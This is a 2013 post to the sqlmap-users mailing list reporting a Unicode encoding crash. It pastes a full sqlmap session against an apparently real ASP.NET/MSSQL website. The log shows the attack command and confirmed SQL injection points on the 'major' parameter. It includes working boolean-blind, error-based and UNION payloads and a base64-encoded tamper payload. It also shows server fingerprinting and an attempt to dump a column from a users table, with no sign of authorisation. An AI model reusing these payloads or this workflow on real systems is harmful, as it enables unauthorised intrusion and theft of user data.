[sqlmap-users] encode err ? thx
From: 沸水浮冰 <sf...@gm...> - 2013-09-21 02:55:29
root@anonymous:~/sqlmap-0905# ./sqlmap.py -r file2 -p 'major' --dbms=mssql --level=5 --risk=3 --tamper=base64encode -D vls3db4 -T dbo.dd_users -C '最后登录时间' --dump --hex -v 3

    sqlmap/1.0-dev-4cf49bc - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 00:51:25

[00:51:25] [INFO] parsing HTTP request from 'file2'
[00:51:25] [DEBUG] not a valid WebScarab log data
[00:51:25] [DEBUG] cleaning up configuration parameters
[00:51:25] [INFO] loading tamper script 'base64encode'
[00:51:25] [DEBUG] setting the HTTP timeout
[00:51:25] [DEBUG] setting the HTTP method to GET
[00:51:25] [DEBUG] creating HTTP requests opener object
[00:51:25] [DEBUG] forcing back-end DBMS to user defined value
[00:51:25] [WARNING] it appears that you have provided tainted parameter values ('major=')waitfor delay'0:0:20'--') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
Are you sure you want to continue? [y/N] y
[00:51:26] [INFO] testing connection to the target URL
[00:51:49] [DEBUG] declared web page charset 'gb2312'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: major
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: classid=&specialid=2&qstr=&major=-1315') OR (1954=1954) AND ('IRZo'='IRZo&station=&idxpage=2&ptopid=
    Vector: OR ([INFERENCE])

    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: classid=&specialid=2&qstr=&major=-3052') OR 5359=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (5359=5359) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113))) AND ('PLJO'='PLJO&station=&idxpage=2&ptopid=
    Vector: OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

    Type: UNION query
    Title: Generic UNION query (random number) - 16 columns
    Payload: classid=&specialid=2&qstr=&major=-7814') UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+CHAR(106)+CHAR(86)+CHAR(99)+CHAR(114)+CHAR(70)+CHAR(111)+CHAR(78)+CHAR(116)+CHAR(69)+CHAR(87)+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113),1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654-- &station=&idxpage=2&ptopid=
    Vector: UNION ALL SELECT [QUERY],9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026--
---
[00:51:49] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[00:51:49] [INFO] testing Microsoft SQL Server
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [INFO] confirming Microsoft SQL Server
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [PAYLOAD] LTQ3MjInKSBVTklPTiBBTEwgU0VMRUNUIENIQVIoMTEzKStDSEFSKDEyMikrQ0hBUigxMTgpK0NIQVIoMTIxKStDSEFSKDExMykrKENBU0UgV0hFTiAoQ09OQ0FUKE5VTEwsTlVMTCk9Q09OQ0FUKE5VTEwsTlVMTCkpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpK0NIQVIoMTEzKStDSEFSKDEwMSkrQ0hBUig5OSkrQ0hBUig5OSkrQ0hBUigxMTMpLDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LS0g
[00:51:50] [DEBUG] performed 1 queries in 0.57 seconds
[00:51:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[00:51:50] [INFO] fetching columns '最后登录时间' for table 'dd_users' in database 'vls3db4'
[00:51:50] [INFO] the SQL query used returns 1 entries
[00:51:50] [DEBUG] performed 0 queries in 0.02 seconds
[00:51:50] [INFO] fetching entries of column(s) '[最后登录时间]' for table 'dd_users' in database 'vls3db4'
[00:51:50] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:50] [INFO] fetching number of distinct values for column '[最后登录时间]'
Traceback (most recent call last):
  File "/root/sqlmap-0905/thirdparty/ansistrm/ansistrm.py", line 51, in emit
    message = stdoutencode(self.format(record))
  File "/root/sqlmap-0905/lib/core/convert.py", line 160, in stdoutencode
    retVal = data.encode(UNICODE_ENCODING)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe6 in position 688: ordinal not in range(128)
Logged from file sqlmap.py, line 125
Traceback (most recent call last):
  File "./sqlmap.py", line 95, in main
    start()
  File "/root/sqlmap-0905/lib/controller/controller.py", line 582, in start
    action()
  File "/root/sqlmap-0905/lib/controller/action.py", line 127, in action
    conf.dbmsHandler.dumpTable()
  File "/root/sqlmap-0905/plugins/generic/entries.py", line 155, in dumpTable
    retVal = pivotDumpTable(table, colList, blind=False)
  File "/root/sqlmap-0905/lib/utils/pivotdumptable.py", line 86, in pivotDumpTable
    value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
  File "/root/sqlmap-0905/lib/request/inject.py", line 360, in getValue
    value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
  File "/root/sqlmap-0905/lib/request/inject.py", line 312, in _goUnion
    output = unionUse(expression, unpack=unpack, dump=dump)
  File "/root/sqlmap-0905/lib/techniques/union/use.py", line 334, in unionUse
    output = _oneShotUnionUse(expression, unpack)
  File "/root/sqlmap-0905/lib/techniques/union/use.py", line 73, in _oneShotUnionUse
    page, headers = Request.queryPage(payload, content=True, raise404=False)
  File "/root/sqlmap-0905/lib/request/connect.py", line 641, in queryPage
    payload = function(payload=payload, headers=auxHeaders)
  File "/root/sqlmap-0905/tamper/base64encode.py", line 25, in tamper
    return base64.b64encode(payload) if payload else payload
  File "/usr/lib/python2.7/base64.py", line 53, in b64encode
    encoded = binascii.b2a_base64(s)[:-1]
UnicodeEncodeError: 'ascii' codec can't encode characters in position 147-152: ordinal not in range(128)

[*] shutting down at 00:51:50